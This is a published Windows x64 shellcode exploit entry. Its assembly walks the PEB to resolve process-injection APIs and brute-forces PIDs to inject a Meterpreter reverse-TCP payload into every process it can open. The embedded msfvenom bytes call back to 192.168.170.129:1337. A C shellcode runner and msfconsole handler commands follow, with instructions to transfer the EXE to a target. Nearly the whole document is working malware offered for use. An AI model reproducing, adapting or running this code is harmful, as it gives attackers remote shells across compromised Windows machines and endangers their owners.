655 bytes small 64-bit Windows 10 shellcode that injects all processes with Meterpreter reverse shells.
75a126bd35170b68365261ae4f904c66# Shellcode Title: Windows/x64 - Inject All Processes with Meterpreter Reverse Shell (655 Bytes)
# Shellcode Author: Bobby Cooke (boku)
# Date: May 1st, 2021
# Tested on: Windows 10 v2004 (x64)
# Compiled from: Kali Linux (x86_64)
# Shellcode Description:
# 64bit Windows 10 shellcode that injects all processes with Meterpreter reverse shells. The shellcode first resolves the base address of
# kernel32.dll dynamically in memory via the Intel GS Register & host processes Process Environment Block (PEB). Then resolves the addresses
# for the OpenProcess, VirtualAllocEx, WriteProcessMemory, and CreateRemoteThread APIs via kernel32.dll's Export Table.
# Once all API's are resolved the shellcode then attempts to open a handle to other processes using the OpenProcess API via bruteforcing the PIDs.
# When a handle to a remote process is returned, the shellcode then attempts to allocate writable & executable memory in the remote process using the
# VirtualAllocEx API. If successful, the shellcode will then use the WriteProcessMemory API to write the Meterpreter shellcode into the memory of the
# remote process. To this point, if everything has returned sucessful, then the CreateRemoteThread API will be executed to create a thread in the remote
# process that will run the Meterpreter shell within that remote process. The shellcode then continues to bruteforce through more PIDs to launch more
# Meterpreter shells.
; Compile & get shellcode from Kali:
; nasm -f win64 x64win-InjectAllProcMeterpreterRevSh.asm -o x64win-InjectAllProcMeterpreterRevSh.o
; for i in $(objdump -D x64win-InjectAllProcMeterpreterRevSh.o | grep "^ " | cut -f2); do echo -n "\x$i" ; done
; Get kernel32.dll base address
xor rdi, rdi ; RDI = 0x0
mul rdi ; RAX&RDX =0x0
mov rbx, gs:[rax+0x60] ; RBX = Address_of_PEB
mov rbx, [rbx+0x18] ; RBX = Address_of_LDR
mov rbx, [rbx+0x20] ; RBX = 1st entry in InitOrderModuleList / ntdll.dll
mov rbx, [rbx] ; RBX = 2nd entry in InitOrderModuleList / kernelbase.dll
mov rbx, [rbx] ; RBX = 3rd entry in InitOrderModuleList / kernel32.dll
mov rbx, [rbx+0x20] ; RBX = &kernel32.dll ( Base Address of kernel32.dll)
mov r8, rbx ; RBX & R8 = &kernel32.dll
; Get kernel32.dll ExportTable Address
mov ebx, [rbx+0x3C] ; RBX = Offset NewEXEHeader
add rbx, r8 ; RBX = &kernel32.dll + Offset NewEXEHeader = &NewEXEHeader
xor rcx, rcx ; Avoid null bytes from mov edx,[rbx+0x88] by using rcx register to add
add cx, 0x88ff
shr rcx, 0x8 ; RCX = 0x88ff --> 0x88
mov edx, [rbx+rcx] ; EDX = [&NewEXEHeader + Offset RVA ExportTable] = RVA ExportTable
add rdx, r8 ; RDX = &kernel32.dll + RVA ExportTable = &ExportTable
; Get Number of Functions in Kernel32.dll ExportTable
xor r9, r9
mov r9d, [rdx+0x14] ; R9 = Number of Functions Kernel32.dll ExportTable
; Get &AddressTable from Kernel32.dll ExportTable
xor r10, r10
mov r10d, [rdx+0x1C] ; RDI = RVA AddressTable
add r10, r8 ; R10 = &AddressTable
; Get &NamePointerTable from Kernel32.dll ExportTable
xor r11, r11
mov r11d, [rdx+0x20] ; R11 = [&ExportTable + Offset RVA Name PointerTable] = RVA NamePointerTable
add r11, r8 ; R11 = &NamePointerTable (Memory Address of Kernel32.dll Export NamePointerTable)
; Get &OrdinalTable from Kernel32.dll ExportTable
xor r12, r12
mov r12d, [rdx+0x24] ; R12 = RVA OrdinalTable
add r12, r8 ; R12 = &OrdinalTable
jmp short apis
; Get the address of the API from the Kernel32.dll ExportTable
getapiaddr:
pop rbx ; save the return address for ret 2 caller after API address is found
pop rcx ; Get the string length counter from stack
xor rax, rax ; Setup Counter for resolving the API Address after finding the name string
mov rdx, rsp ; RDX = Address of API Name String to match on the Stack
push rcx ; push the string length counter to stack
loop:
mov rcx, [rsp] ; reset the string length counter from the stack
xor rdi,rdi ; Clear RDI for setting up string name retrieval
mov edi, [r11+rax*4] ; EDI = RVA NameString = [&NamePointerTable + (Counter * 4)]
add rdi, r8 ; RDI = &NameString = RVA NameString + &kernel32.dll
mov rsi, rdx ; RSI = Address of API Name String to match on the Stack (reset to start of string)
repe cmpsb ; Compare strings at RDI & RSI
je resolveaddr ; If match then we found the API string. Now we need to find the Address of the API
incloop:
inc rax
cmp rax, r9 ; Have we exhausted all APIs in the Export Table?
jne loop
; Find the address of GetProcAddress by using the last value of the Counter
resolveaddr:
pop rcx ; remove string length counter from top of stack
mov ax, [r12+rax*2] ; RAX = [&OrdinalTable + (Counter*2)] = ordinalNumber of kernel32.<API>
mov eax, [r10+rax*4] ; RAX = RVA API = [&AddressTable + API OrdinalNumber]
add rax, r8 ; RAX = Kernel32.<API> = RVA kernel32.<API> + kernel32.dll BaseAddress
push rbx ; place the return address from the api string call back on the top of the stack
ret ; return to API caller
apis: ; API Names to resolve addresses
; OpenProcess | String length : 11
xor rcx, rcx
add cl, 0xC ; String length for compare string 11(0xB)+NullByte = 0xC
xor rax, rax
add rax, 0x737365FF ; sse,0xFF : 737365FF
shr rax, 0x8 ; sse,0xFF --> 0x00,sse
push rax
mov rax, 0x636f72506e65704f ; corPnepO : 636f72506e65704f
push rax
push rcx ; push the string length counter to stack
call getapiaddr ; Get the address of the API from Kerenl32.dll ExportTable
mov r13, rax ; R13 = &OpenProcess
; VirtualAllocEx | String length : 14
xor rcx, rcx
add cl, 0xF ; String length for compare string 14(0xE)+NullByte = 0xF
mov rax, 0x7845636F6C6CFFFF ; xEcoll,0xFFFF : 7845636f6c6cFFFF
shr rax, 0x10 ; xEcoll,0xFFFF --> 0x0000,xEcoll
push rax
mov rax, 0x416c617574726956 ; AlautriV : 416c617574726956
push rax
push rcx ; push the string length counter to stack
call getapiaddr ; Get the address of the API from Kerenl32.dll ExportTable
mov r14, rax ; R14 = &VirtualAllocEx
; WriteProcessMemory | String length : 18
xor rcx, rcx
push rcx
add cl, 0x9 ; String length for compare string
mov rax, 0x6f6d654d73736563 ; omeMssec : 6f6d654d73736563
push rax
mov rax, 0x6f72506574697257 ; orPetirW : 6f72506574697257
push rax
push rcx ; push the string length counter to stack
call getapiaddr ; Get the address of the API from Kerenl32.dll ExportTable
mov r15, rax ; R15 = &WriteProcessMemory
; CreateRemoteThread | String length : 18
xor rcx, rcx
push rcx
add cl, 0x7 ; String length for compare string
mov rax, 0x6552657461657243 ; eRetaerC : 6552657461657243
push rax
push rcx ; push the string length counter to stack
call getapiaddr ; Get the address of the API from Kerenl32.dll ExportTable
mov r12, rax ; R12 = &CreateRemoteThread
; R11 = Handle Counter | R12 = &CreateRemoteThread | R13 = &OpenProcess | R14 = &VirtualAllocEx | R15 = &WriteProcessMemory
save2stack:
push r12
push r13
push r14
push r15
jmp short loopinit
getAddrFromStack:
pop rcx ; pop ret address
pop r11
mov r15, [rsp]
mov r14, [rsp+0x8]
mov r13, [rsp+0x10]
mov r12, [rsp+0x18]
push rcx
ret
loopinit:
xor r11, r11
add r11, 0xFA0 ; PID-1 - Start at PID 4000
hprocloop:
inc r11 ; Increment the PID Loop counter by 1 and try to open another handle
push r11
; hProc = OpenProcess(PROCESS_ALL_ACCESS, false, i);
; HANDLE OpenProcess(
; DWORD dwDesiredAccess, => RCX = 0x1FFFFF = PROCESS_ALL_ACCESS
; BOOL bInheritHandle, => RDX = 0x0 = false
; DWORD dwProcessId => R8 = ProcessID (PID of target process to inject too)
; );
sub rsp, 0x40 ; Allocate 0x28 (40) bytes on the stack
xor rcx, rcx
add rcx, 0x1FFFFFFF ; RCX = 0x1FFFFFFF
shr rcx, 0x8 ; RCX = 0x1FFFFFFF --> 0x001FFFFF = PROCESS_ALL_ACCESS
xor rdx, rdx ; RDX = 0x0 = false
xor r8,r8
mov r8, r11 ; R8 = ProcessID (PID of target process to inject too)
call r13 ; RAX will return the Process Handle for the opened remote process
add rsp, 0x40 ; clean up stack
call getAddrFromStack ; reset API addresses in registers
xor rdx, rdx ; RDX = Returned Null? (Could not Open a handle to remote process)
cmp rax, rdx
je hprocloop ; Failed to get a handle to remote process, increment ProcessID by 1 and try again
push r11 ; push counter to stack to avoid clobber
push rax ; Save hProcess handle to stack - R10 & RAX & RCX get clobbered by VirtualAllocEx()
; remoteProcAddr = VirtualAllocEx(hProc, 0, payload_len, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
; LPVOID VirtualAllocEx(
; HANDLE hProcess, => RCX = Process Handle returned from OpenProcess()
; LPVOID lpAddress, => RDX = 0x0 - Will allow kernel to allocate the dest memory addr in remote process
; SIZE_T dwSize, => R8 = 0x1000 - Memory size to allocate
; DWORD flAllocationType, => R9 = 0x3000 => MEM_RESERVE
; DWORD flProtect => [RSP+0x20] = 0x40 => PAGE_EXECUTE_READWRITE - Makes the memory buffer in remote process Read&Write&Executable (Required for DEP)
; );
sub rsp, 0x40 ; Allocate 0x28 (40) bytes on the stack
mov rcx, rax ; RCX = HANDLE hProcess
xor rdx, rdx ; RDX = 0x0 = lpAddress
xor r8, r8
xor rbx, rbx
add bx, 0x10FF
shr rbx, 0x8 ; 0x10FF --> 0x10
shl rbx, 0x8 ; 0x10 --> 0x1000
add r8, rbx ; R8 = dwSize
xor r9, r9
xor rbx, rbx
add bx, 0x30FF
shr rbx, 0x8 ; 0x30FF --> 0x30
shl rbx, 0x8 ; 0x30 --> 0x3000
add r9, rbx ; R9 = flAllocationType
xor rbx, rbx
add bx, 0x40FF
shr rbx, 0x8 ; 0x40FF --> 0x40
mov [rsp+0x20], rbx ; [RSP=0x20] = flProtect
call r14 ; If success, RAX = Address of allocated memory in remote process
add rsp, 0x40 ; clean up stack
pop r10 ; get open handle to remote process from stack
call getAddrFromStack ; reset API addresses in registers
xor rdx, rdx ; RDX = Returned Null? (Could allocate memory in remote process)
cmp rax, rdx
je hprocloop ; Failed to allocate memory in remote process, increment ProcessID by 1 and try again
push r11
push rax ; Save remoteProcAddr to stack
push r10 ; Save hProcess handle to stack - R10 & RAX & RCX get clobbered by VirtualAllocEx()
; n = WriteProcessMemory(hProc, remoteProcAddr, payload, payload_len, NULL);
; BOOL WriteProcessMemory(
; HANDLE hProcess, => RCX = Process Handle returned from OpenProcess()
; LPVOID lpBaseAddress, => RDX = Memory address in remote process returned from VirtualAllocEx()
; LPCVOID lpBuffer, => R8 = Memory address in host process of the shellcode that will be injected into remote process
; SIZE_T nSize, => R9 = 0x1000 - Memory size to allocate
; SIZE_T *lpNumberOfBytesWritten => [RSP+0x20] = 0x0 - Have to place 5th+ values on stack. Need to leave 32 bytes for "Shadow Space" 0x20=32bytes
; );
sub rsp, 0x40 ; Allocate 0x28 (40) bytes on the stack
mov rcx, r10 ; RCX = HANDLE hProcess
mov rdx, rax ; RDX = lpBaseAddress
jmp short callPayload
popPayload:
pop r8 ; r8 = local shellcode payload address
xor rbx, rbx
add bx, 0x10FF
shr rbx, 0x8 ; 0x10FF --> 0x10
shl rbx, 0x8 ; 0x10 --> 0x1000
mov r9, rbx ; R9 = nSize
xor rbx, rbx
mov [rsp+0x20], rbx ; [RSP=0x20] = *lpNumberOfBytesWritten
call r15 ; if success will return True (1) else False (0) = fail
add rsp, 0x40 ; clean up stack
pop r10 ; get Process Handle from stack
pop r9 ; R9 = remoteProcAddr
call getAddrFromStack ; reset API addresses in registers
xor rdx, rdx ; RDX = Returned Null? (Could write memory in remote process)
cmp rax, rdx
je hprocloop ; Failed to write memory in remote process, increment ProcessID by 1 and try again
; CreateRemoteThread(hProc, NULL, 0, (LPTHREAD_START_ROUTINE)remoteProcAddr, NULL, NULL, NULL);
; HANDLE CreateRemoteThread(
; HANDLE hProcess, => RCX = Process Handle returned from OpenProcess()
; LPSECURITY_ATTRIBUTES lpThreadAttributes, => RDX = 0x0
; SIZE_T dwStackSize, => R8 = 0x0
; LPTHREAD_START_ROUTINE lpStartAddress, => R9 = remoteProcAddr
; LPVOID lpParameter, => [RSP+0x20] = 0x0
; DWORD dwCreationFlags, => [RSP+0x28] = 0x0
; LPDWORD lpThreadId => [RSP+0x30] = 0x0
; );
push r11
sub rsp, 0x40 ; Allocate 0x28 (40) bytes on the stack
mov rcx, r10 ; RCX = HANDLE hProcess
xor rdx, rdx ; RDX = lpThreadAttributes
xor r8, r8 ; R8 = dwStackSize
; R9 = remoteProcAddr
mov [rsp+0x20], r8 ; lpParameter
mov [rsp+0x28], r8 ; dwCreationFlag
mov [rsp+0x30], r8 ; lpThreadId
call r12 ; Call CreateRemoteThread()
add rsp, 0x40 ; clean up stack
call getAddrFromStack ; reset API addresses in registers
xor rax,rax
xor rdx,rdx
je hprocloop ; Do the process injection again on more processes
callPayload:
call popPayload
; nopsled
db 0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90
payload:
; msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.170.129 LPORT=1337 EXITFUNC=thread -f csharp
; Payload size: 511 bytes
db 0xfc,0x48,0x83,0xe4,0xf0,0xe8,0xcc,0x00,0x00,0x00,0x41,0x51,0x41,0x50,0x52,\
0x51,0x56,0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x48,0x8b,0x52,0x18,0x48,\
0x8b,0x52,0x20,0x48,0x8b,0x72,0x50,0x48,0x0f,0xb7,0x4a,0x4a,0x4d,0x31,0xc9,\
0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0x41,0xc1,0xc9,0x0d,0x41,\
0x01,0xc1,0xe2,0xed,0x52,0x41,0x51,0x48,0x8b,0x52,0x20,0x8b,0x42,0x3c,0x48,\
0x01,0xd0,0x66,0x81,0x78,0x18,0x0b,0x02,0x0f,0x85,0x72,0x00,0x00,0x00,0x8b,\
0x80,0x88,0x00,0x00,0x00,0x48,0x85,0xc0,0x74,0x67,0x48,0x01,0xd0,0x8b,0x48,\
0x18,0x50,0x44,0x8b,0x40,0x20,0x49,0x01,0xd0,0xe3,0x56,0x4d,0x31,0xc9,0x48,\
0xff,0xc9,0x41,0x8b,0x34,0x88,0x48,0x01,0xd6,0x48,0x31,0xc0,0x41,0xc1,0xc9,\
0x0d,0xac,0x41,0x01,0xc1,0x38,0xe0,0x75,0xf1,0x4c,0x03,0x4c,0x24,0x08,0x45,\
0x39,0xd1,0x75,0xd8,0x58,0x44,0x8b,0x40,0x24,0x49,0x01,0xd0,0x66,0x41,0x8b,\
0x0c,0x48,0x44,0x8b,0x40,0x1c,0x49,0x01,0xd0,0x41,0x8b,0x04,0x88,0x41,0x58,\
0x41,0x58,0x5e,0x59,0x48,0x01,0xd0,0x5a,0x41,0x58,0x41,0x59,0x41,0x5a,0x48,\
0x83,0xec,0x20,0x41,0x52,0xff,0xe0,0x58,0x41,0x59,0x5a,0x48,0x8b,0x12,0xe9,\
0x4b,0xff,0xff,0xff,0x5d,0x49,0xbe,0x77,0x73,0x32,0x5f,0x33,0x32,0x00,0x00,\
0x41,0x56,0x49,0x89,0xe6,0x48,0x81,0xec,0xa0,0x01,0x00,0x00,0x49,0x89,0xe5,\
0x49,0xbc,0x02,0x00,0x05,0x39,0xc0,0xa8,0xaa,0x81,0x41,0x54,0x49,0x89,0xe4,\
0x4c,0x89,0xf1,0x41,0xba,0x4c,0x77,0x26,0x07,0xff,0xd5,0x4c,0x89,0xea,0x68,\
0x01,0x01,0x00,0x00,0x59,0x41,0xba,0x29,0x80,0x6b,0x00,0xff,0xd5,0x6a,0x0a,\
0x41,0x5e,0x50,0x50,0x4d,0x31,0xc9,0x4d,0x31,0xc0,0x48,0xff,0xc0,0x48,0x89,\
0xc2,0x48,0xff,0xc0,0x48,0x89,0xc1,0x41,0xba,0xea,0x0f,0xdf,0xe0,0xff,0xd5,\
0x48,0x89,0xc7,0x6a,0x10,0x41,0x58,0x4c,0x89,0xe2,0x48,0x89,0xf9,0x41,0xba,\
0x99,0xa5,0x74,0x61,0xff,0xd5,0x85,0xc0,0x74,0x0a,0x49,0xff,0xce,0x75,0xe5,\
0xe8,0x93,0x00,0x00,0x00,0x48,0x83,0xec,0x10,0x48,0x89,0xe2,0x4d,0x31,0xc9,\
0x6a,0x04,0x41,0x58,0x48,0x89,0xf9,0x41,0xba,0x02,0xd9,0xc8,0x5f,0xff,0xd5,\
0x83,0xf8,0x00,0x7e,0x55,0x48,0x83,0xc4,0x20,0x5e,0x89,0xf6,0x6a,0x40,0x41,\
0x59,0x68,0x00,0x10,0x00,0x00,0x41,0x58,0x48,0x89,0xf2,0x48,0x31,0xc9,0x41,\
0xba,0x58,0xa4,0x53,0xe5,0xff,0xd5,0x48,0x89,0xc3,0x49,0x89,0xc7,0x4d,0x31,\
0xc9,0x49,0x89,0xf0,0x48,0x89,0xda,0x48,0x89,0xf9,0x41,0xba,0x02,0xd9,0xc8,\
0x5f,0xff,0xd5,0x83,0xf8,0x00,0x7d,0x28,0x58,0x41,0x57,0x59,0x68,0x00,0x40,\
0x00,0x00,0x41,0x58,0x6a,0x00,0x5a,0x41,0xba,0x0b,0x2f,0x0f,0x30,0xff,0xd5,\
0x57,0x59,0x41,0xba,0x75,0x6e,0x4d,0x61,0xff,0xd5,0x49,0xff,0xce,0xe9,0x3c,\
0xff,0xff,0xff,0x48,0x01,0xc3,0x48,0x29,0xc6,0x48,0x85,0xf6,0x75,0xb4,0x41,\
0xff,0xe7,0x58,0x6a,0x00,0x59,0xbb,0xe0,0x1d,0x2a,0x0a,0x41,0x89,0xda,0xff,\
0xd5
; nopsled
db 0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90
###############################################################################################################
// shellcode-CppRunner.c
// Cross-Compiled from x64 Kali with mingw
// x86_64-w64-mingw32-gcc shellcode-cppRunner.c -o shellcode-cppRunner.exe
// ^ Now transfer the EXE to the target windows host, execute it, and have this shellcode runner do its thing for a demo
// - Make sure to start the multi/handler on your MSFConsole to catch the meterpreter reverse shells
// msfconsole; msf6 > use multi/handler; msf6 > set payload windows/x64/meterpreter/reverse_tcp; msf6 > set lhost 192.168.170.129; msf6 > set lport 1337; run
// ^ Replace the msfvenom code below, and mod the msfconsole commands to your lhost and lport & mod payload_len var below if your met shell in not == 511 bytes
#include <windows.h>
#include <stdlib.h>
unsigned char scode[] =
// The Process injector shellcode that dynamically resolves the APIs and injects all processes on the target that it can get a handle too
"\x48\x31\xff\x48\xf7\xe7\x65\x48\x8b\x58\x60\x48\x8b\x5b\x18\x48\x8b\x5b\x20\x48\x8b\x1b\x48\x8b\x1b\x48\x8b\x5b\x20\x49\x89\xd8\x8b\x5b\x3c\x4c\x01\xc3\x48\x31"
"\xc9\x66\x81\xc1\xff\x88\x48\xc1\xe9\x08\x8b\x14\x0b\x4c\x01\xc2\x4d\x31\xc9\x44\x8b\x4a\x14\x4d\x31\xd2\x44\x8b\x52\x1c\x4d\x01\xc2\x4d\x31\xdb\x44\x8b\x5a\x20"
"\x4d\x01\xc3\x4d\x31\xe4\x44\x8b\x62\x24\x4d\x01\xc4\xeb\x35\x5b\x59\x48\x31\xc0\x48\x89\xe2\x51\x48\x8b\x0c\x24\x48\x31\xff\x41\x8b\x3c\x83\x4c\x01\xc7\x48\x89"
"\xd6\xf3\xa6\x74\x08\x48\xff\xc0\x4c\x39\xc8\x75\xe3\x59\x66\x41\x8b\x04\x44\x41\x8b\x04\x82\x4c\x01\xc0\x53\xc3\x48\x31\xc9\x80\xc1\x0c\x48\x31\xc0\x48\x05\xff"
"\x65\x73\x73\x48\xc1\xe8\x08\x50\x48\xb8\x4f\x70\x65\x6e\x50\x72\x6f\x63\x50\x51\xe8\xa6\xff\xff\xff\x49\x89\xc5\x48\x31\xc9\x80\xc1\x0f\x48\xb8\xff\xff\x6c\x6c"
"\x6f\x63\x45\x78\x48\xc1\xe8\x10\x50\x48\xb8\x56\x69\x72\x74\x75\x61\x6c\x41\x50\x51\xe8\x7d\xff\xff\xff\x49\x89\xc6\x48\x31\xc9\x51\x80\xc1\x09\x48\xb8\x63\x65"
"\x73\x73\x4d\x65\x6d\x6f\x50\x48\xb8\x57\x72\x69\x74\x65\x50\x72\x6f\x50\x51\xe8\x57\xff\xff\xff\x49\x89\xc7\x48\x31\xc9\x51\x80\xc1\x07\x48\xb8\x43\x72\x65\x61"
"\x74\x65\x52\x65\x50\x51\xe8\x3c\xff\xff\xff\x49\x89\xc4\x41\x54\x41\x55\x41\x56\x41\x57\xeb\x18\x59\x41\x5b\x4c\x8b\x3c\x24\x4c\x8b\x74\x24\x08\x4c\x8b\x6c\x24"
"\x10\x4c\x8b\x64\x24\x18\x51\xc3\x4d\x31\xdb\x49\x81\xc3\xa0\x0f\x00\x00\x49\xff\xc3\x41\x53\x48\x83\xec\x40\x48\x31\xc9\x48\x81\xc1\xff\xff\xff\x1f\x48\xc1\xe9"
"\x08\x48\x31\xd2\x4d\x31\xc0\x4d\x89\xd8\x41\xff\xd5\x48\x83\xc4\x40\xe8\xb2\xff\xff\xff\x48\x31\xd2\x48\x39\xd0\x74\xcc\x41\x53\x50\x48\x83\xec\x40\x48\x89\xc1"
"\x48\x31\xd2\x4d\x31\xc0\x48\x31\xdb\x66\x81\xc3\xff\x10\x48\xc1\xeb\x08\x48\xc1\xe3\x08\x49\x01\xd8\x4d\x31\xc9\x48\x31\xdb\x66\x81\xc3\xff\x30\x48\xc1\xeb\x08"
"\x48\xc1\xe3\x08\x49\x01\xd9\x48\x31\xdb\x66\x81\xc3\xff\x40\x48\xc1\xeb\x08\x48\x89\x5c\x24\x20\x41\xff\xd6\x48\x83\xc4\x40\x41\x5a\xe8\x52\xff\xff\xff\x48\x31"
"\xd2\x48\x39\xd0\x0f\x84\x68\xff\xff\xff\x41\x53\x50\x41\x52\x48\x83\xec\x40\x4c\x89\xd1\x48\x89\xc2\xeb\x6f\x41\x58\x48\x31\xdb\x66\x81\xc3\xff\x10\x48\xc1\xeb"
"\x08\x48\xc1\xe3\x08\x49\x89\xd9\x48\x31\xdb\x48\x89\x5c\x24\x20\x41\xff\xd7\x48\x83\xc4\x40\x41\x5a\x41\x59\xe8\x08\xff\xff\xff\x48\x31\xd2\x48\x39\xd0\x0f\x84"
"\x1e\xff\xff\xff\x41\x53\x48\x83\xec\x40\x4c\x89\xd1\x48\x31\xd2\x4d\x31\xc0\x4c\x89\x44\x24\x20\x4c\x89\x44\x24\x28\x4c\x89\x44\x24\x30\x41\xff\xd4\x48\x83\xc4"
"\x40\xe8\xd2\xfe\xff\xff\x48\x31\xc0\x48\x31\xd2\x0f\x84\xe8\xfe\xff\xff\xe8\x8c\xff\xff\xff\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
// To inject all processes on the target running this shellcode with your own Meterpreter Reverse shell (with your own IP), use msfvenom and replace below
// msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.170.129 LPORT=1337 EXITFUNC=thread -f c
"\xfc\x48\x83\xe4\xf0\xe8\xcc\x00\x00\x00\x41\x51\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a"
"\x4a\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48\x01\xd0\x66\x81\x78\x18"
"\x0b\x02\x0f\x85\x72\x00\x00\x00\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01\xd0\x8b\x48\x18\x50\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x4d\x31\xc9\x48\xff"
"\xc9\x41\x8b\x34\x88\x48\x01\xd6\x48\x31\xc0\x41\xc1\xc9\x0d\xac\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01"
"\xd0\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x41\x58\x41\x58\x5e\x59\x48\x01\xd0\x5a\x41\x58\x41\x59\x41\x5a\x48\x83\xec\x20\x41\x52\xff"
"\xe0\x58\x41\x59\x5a\x48\x8b\x12\xe9\x4b\xff\xff\xff\x5d\x49\xbe\x77\x73\x32\x5f\x33\x32\x00\x00\x41\x56\x49\x89\xe6\x48\x81\xec\xa0\x01\x00\x00\x49\x89\xe5\x49"
"\xbc\x02\x00\x05\x39\xc0\xa8\xaa\x81\x41\x54\x49\x89\xe4\x4c\x89\xf1\x41\xba\x4c\x77\x26\x07\xff\xd5\x4c\x89\xea\x68\x01\x01\x00\x00\x59\x41\xba\x29\x80\x6b\x00"
"\xff\xd5\x6a\x0a\x41\x5e\x50\x50\x4d\x31\xc9\x4d\x31\xc0\x48\xff\xc0\x48\x89\xc2\x48\xff\xc0\x48\x89\xc1\x41\xba\xea\x0f\xdf\xe0\xff\xd5\x48\x89\xc7\x6a\x10\x41"
"\x58\x4c\x89\xe2\x48\x89\xf9\x41\xba\x99\xa5\x74\x61\xff\xd5\x85\xc0\x74\x0a\x49\xff\xce\x75\xe5\xe8\x93\x00\x00\x00\x48\x83\xec\x10\x48\x89\xe2\x4d\x31\xc9\x6a"
"\x04\x41\x58\x48\x89\xf9\x41\xba\x02\xd9\xc8\x5f\xff\xd5\x83\xf8\x00\x7e\x55\x48\x83\xc4\x20\x5e\x89\xf6\x6a\x40\x41\x59\x68\x00\x10\x00\x00\x41\x58\x48\x89\xf2"
"\x48\x31\xc9\x41\xba\x58\xa4\x53\xe5\xff\xd5\x48\x89\xc3\x49\x89\xc7\x4d\x31\xc9\x49\x89\xf0\x48\x89\xda\x48\x89\xf9\x41\xba\x02\xd9\xc8\x5f\xff\xd5\x83\xf8\x00"
"\x7d\x28\x58\x41\x57\x59\x68\x00\x40\x00\x00\x41\x58\x6a\x00\x5a\x41\xba\x0b\x2f\x0f\x30\xff\xd5\x57\x59\x41\xba\x75\x6e\x4d\x61\xff\xd5\x49\xff\xce\xe9\x3c\xff"
"\xff\xff\x48\x01\xc3\x48\x29\xc6\x48\x85\xf6\x75\xb4\x41\xff\xe7\x58\x6a\x00\x59\xbb\xe0\x1d\x2a\x0a\x41\x89\xda\xff\xd5\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90";
unsigned int payload_len = 1166;
int main(int argc, char** argv)
{
DWORD oldprotect = 0;
void* exec = VirtualAlloc(0, payload_len, MEM_COMMIT, PAGE_READWRITE);
memcpy(exec, scode, payload_len);
auto vp = VirtualProtect(exec, payload_len, PAGE_EXECUTE_READ, &oldprotect);
((void(*)())exec)();
}